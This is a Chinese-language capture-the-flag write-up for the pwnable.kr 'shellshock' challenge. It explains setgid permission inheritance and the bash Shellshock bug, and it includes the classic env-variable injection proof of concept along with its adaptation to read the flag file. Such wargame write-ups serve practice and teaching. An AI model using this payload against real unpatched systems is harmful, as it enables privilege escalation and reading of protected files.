pwnable从入门到放弃,第五题。

ssh shellshock@pwnable.kr -p2222 (pw:guest)

这题主要涉及了一个关于bash的CVE漏洞。

首先还是下载源代码审计一下,shellshock.c

#include <stdio.h>
int main(){
    setresuid(getegid(), getegid(), getegid());
    setresgid(getegid(), getegid(), getegid());
    system("/home/shellshock/bash -c 'echo shock_me'");
    return 0;
}

首先是一个关于可执行程序权限的问题,就是关于uid和gid的。

先看一下各个文件的权限

首先启动时,用户是shellshock权限,也就是other权限,这样的话对flag还是不可读的。linux开关机熟练选手根本就没懂啥意思。

后来发现shellshock这个可执行文件对group是具有特殊权限w的,这就意味着egid是属于shellshock_pwn的,这个权限很高,对flag文件是可读的,这也就涉及到了linux可执行文件权限继承和赋予问题。

我查阅了一下《C和C++安全编码》书中讲权限部分的,这相当于设置了egid,因此在代码中setreuid中设置的各uid均是预置的高权限,即egid——shellshock_pwn,因此这个可执行文件在执行到system一行时,就已经是具有shellshock_pwn组权限的程序了。

bash也是用这个组权限在打开,所以对flag是可读的。

 

解决了权限问题,就可以考虑如何代码执行了,这个破壳漏洞是可以作为一个本地提权漏洞使用,参考金山毒霸在freebuf上的漏洞分析贴,:http://www.freebuf.com/articles/system/45390.html

可以使用上面提到了poc,

env x='() { :;}; echo vulnerable' bash -c "echo this is a test" 

可验证这个漏洞在./bash上是存在的:

 

将echo v...' 换成想执行的命令 bash -c "cat ./flag"'

而./ bash -c "echo this is a test" 换成./shellshock

 

 

偷个懒,破壳漏洞明天再看。